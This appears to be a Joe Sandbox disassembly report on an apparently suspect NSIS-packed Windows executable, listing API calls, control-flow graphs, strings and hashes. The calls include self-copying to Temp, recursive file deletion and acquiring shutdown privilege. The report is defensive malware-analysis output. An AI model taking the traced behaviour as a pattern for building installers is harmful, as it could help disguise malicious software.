                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                                                    • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                                                      • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                    • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                    • ExitProcess.KERNEL32 ref: 00403701
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                    • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\ln5S7fIBkY.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
                                                                    • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                    • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                    • ExitProcess.KERNEL32 ref: 004038A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\Desktop$C:\Users\user\Desktop\ln5S7fIBkY.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                    • API String ID: 3441113951-2686351140
                                                                    • Opcode ID: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                                                    • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                    • Opcode Fuzzy Hash: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                                                    • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 139 40543e-405459 140 4055e8-4055ef 139->140 141 40545f-405526 GetDlgItem * 3 call 404243 call 404b9c GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 4055f1-405613 GetDlgItem CreateThread CloseHandle 140->143 144 405619-405626 140->144 164 405544-405547 141->164 165 405528-405542 SendMessageW * 2 141->165 143->144 146 405644-40564e 144->146 147 405628-40562e 144->147 150 405650-405656 146->150 151 4056a4-4056a8 146->151 148 405630-40563f ShowWindow * 2 call 404243 147->148 149 405669-405672 call 404275 147->149 148->146 161 405677-40567b 149->161 154 405658-405664 call 4041e7 150->154 155 40567e-40568e ShowWindow 150->155 151->149 158 4056aa-4056b0 151->158 154->149 162 405690-405699 call 4052ff 155->162 163 40569e-40569f call 4041e7 155->163 158->149 159 4056b2-4056c5 SendMessageW 158->159 166 4057c7-4057c9 159->166 167 4056cb-4056f6 CreatePopupMenu call 4062b9 AppendMenuW 159->167 162->163 163->151 168 405557-40556e call 40420e 164->168 169 405549-405555 SendMessageW 164->169 165->164 166->161 176 4056f8-405708 GetWindowRect 167->176 177 40570b-405720 TrackPopupMenu 167->177 178 405570-405584 ShowWindow 168->178 179 4055a4-4055c5 GetDlgItem SendMessageW 168->179 169->168 176->177 177->166 180 405726-40573d 177->180 181 405593 178->181 182 405586-405591 ShowWindow 178->182 179->166 183 4055cb-4055e3 SendMessageW * 2 179->183 184 405742-40575d SendMessageW 180->184 185 405599-40559f call 404243 181->185 182->185 183->166 184->184 186 40575f-405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405784-4057ab SendMessageW 186->188 188->188 189 4057ad-4057c1 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->166
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                    • GetClientRect.USER32(?,?), ref: 004054E8
                                                                    • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                    • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                      • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00405613
                                                                    • ShowWindow.USER32(00000000), ref: 00405637
                                                                    • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                    • ShowWindow.USER32(00000008), ref: 00405686
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                    • CreatePopupMenu.USER32 ref: 004056CB
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                    • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                    • OpenClipboard.USER32(00000000), ref: 00405760
                                                                    • EmptyClipboard.USER32 ref: 00405766
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                    • CloseClipboard.USER32 ref: 004057C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: {
                                                                    • API String ID: 590372296-366298937
                                                                    • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                    • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                    • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                    • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 499 4059a9-4059cf call 405c74 502 4059d1-4059e3 DeleteFileW 499->502 503 4059e8-4059ef 499->503 506 405b65-405b69 502->506 504 4059f1-4059f3 503->504 505 405a02-405a12 call 406297 503->505 507 405b13-405b18 504->507 508 4059f9-4059fc 504->508 512 405a21-405a22 call 405bb8 505->512 513 405a14-405a1f lstrcatW 505->513 507->506 511 405b1a-405b1d 507->511 508->505 508->507 514 405b27-405b2f call 4065da 511->514 515 405b1f-405b25 511->515 516 405a27-405a2b 512->516 513->516 514->506 523 405b31-405b45 call 405b6c call 405961 514->523 515->506 519 405a37-405a3d lstrcatW 516->519 520 405a2d-405a35 516->520 522 405a42-405a5e lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a64-405a6c 522->524 525 405b08-405b0c 522->525 539 405b47-405b4a 523->539 540 405b5d-405b60 call 4052ff 523->540 528 405a8c-405aa0 call 406297 524->528 529 405a6e-405a76 524->529 525->507 527 405b0e 525->527 527->507 541 405aa2-405aaa 528->541 542 405ab7-405ac2 call 405961 528->542 533 405a78-405a80 529->533 534 405aeb-405afb FindNextFileW 529->534 533->528 538 405a82-405a8a 533->538 534->524 537 405b01-405b02 FindClose 534->537 537->525 538->528 538->534 539->515 543 405b4c-405b5b call 4052ff call 40605d 539->543 540->506 541->534 544 405aac-405ab5 call 4059a9 541->544 552 405ae3-405ae6 call 4052ff 542->552 553 405ac4-405ac7 542->553 543->506 544->534 552->534 556 405ac9-405ad9 call 4052ff call 40605d 553->556 557 405adb-405ae1 553->557 556->534 557->534
                                                                    APIs
                                                                    • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 004059D2
                                                                    • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A1A
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A3D
                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A43
                                                                    • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A53
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                    • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                    • API String ID: 2035342205-1451639314
                                                                    • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                    • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                    • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                    • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 725 4065da-4065ee FindFirstFileW 726 4065f0-4065f9 FindClose 725->726 727 4065fb 725->727 728 4065fd-4065fe 726->728 727->728
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 004065E5
                                                                    • FindClose.KERNELBASE(00000000), ref: 004065F1
                                                                    Strings
                                                                    • pOz, xrefs: 004065DB
                                                                    • C:\Users\user\AppData\Local\Temp\nsu4D43.tmp, xrefs: 004065DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp$pOz
                                                                    • API String ID: 2295610775-3324167676
                                                                    • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                    • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                    • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                    • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                                                    • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                                                    • Opcode Fuzzy Hash: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                                                    • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 190 403d35-403d47 191 403e88-403e97 190->191 192 403d4d-403d53 190->192 194 403ee6-403efb 191->194 195 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 191->195 192->191 193 403d59-403d62 192->193 196 403d64-403d71 SetWindowPos 193->196 197 403d77-403d7a 193->197 199 403f3b-403f40 call 40425a 194->199 200 403efd-403f00 194->200 195->194 196->197 204 403d94-403d9a 197->204 205 403d7c-403d8e ShowWindow 197->205 209 403f45-403f60 199->209 201 403f02-403f0d call 401389 200->201 202 403f33-403f35 200->202 201->202 223 403f0f-403f2e SendMessageW 201->223 202->199 208 4041db 202->208 210 403db6-403db9 204->210 211 403d9c-403db1 DestroyWindow 204->211 205->204 216 4041dd-4041e4 208->216 214 403f62-403f64 call 40140b 209->214 215 403f69-403f6f 209->215 219 403dbb-403dc7 SetWindowLongW 210->219 220 403dcc-403dd2 210->220 217 4041b8-4041be 211->217 214->215 226 403f75-403f80 215->226 227 404199-4041b2 DestroyWindow EndDialog 215->227 217->208 225 4041c0-4041c6 217->225 219->216 221 403e75-403e83 call 404275 220->221 222 403dd8-403de9 GetDlgItem 220->222 221->216 228 403e08-403e0b 222->228 229 403deb-403e02 SendMessageW IsWindowEnabled 222->229 223->216 225->208 231 4041c8-4041d1 ShowWindow 225->231 226->227 232 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 226->232 227->217 233 403e10-403e13 228->233 234 403e0d-403e0e 228->234 229->208 229->228 231->208 260 403fd5-403fda 232->260 261 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 232->261 238 403e21-403e26 233->238 239 403e15-403e1b 233->239 237 403e3e-403e43 call 4041e7 234->237 237->221 241 403e5c-403e6f SendMessageW 238->241 243 403e28-403e2e 238->243 239->241 242 403e1d-403e1f 239->242 241->221 242->237 247 403e30-403e36 call 40140b 243->247 248 403e45-403e4e call 40140b 243->248 258 403e3c 247->258 248->221 257 403e50-403e5a 248->257 257->258 258->237 260->261 264 40401b-40401c 261->264 265 40401e 261->265 266 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050-404061 SendMessageW 266->267 268 404063 266->268 269 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 267->269 268->269 269->209 280 4040ae-4040b0 269->280 280->209 281 4040b6-4040ba 280->281 282 4040d9-4040ed DestroyWindow 281->282 283 4040bc-4040c2 281->283 282->217 285 4040f3-404120 CreateDialogParamW 282->285 283->208 284 4040c8-4040ce 283->284 284->209 287 4040d4 284->287 285->217 286 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->286 286->208 292 40417f-404192 ShowWindow call 40425a 286->292 287->208 294 404197 292->294 294->217
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                    • ShowWindow.USER32(?), ref: 00403D8E
                                                                    • DestroyWindow.USER32 ref: 00403DA2
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                    • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403EA8
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                    • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                    • EnableWindow.USER32(?,?), ref: 00404011
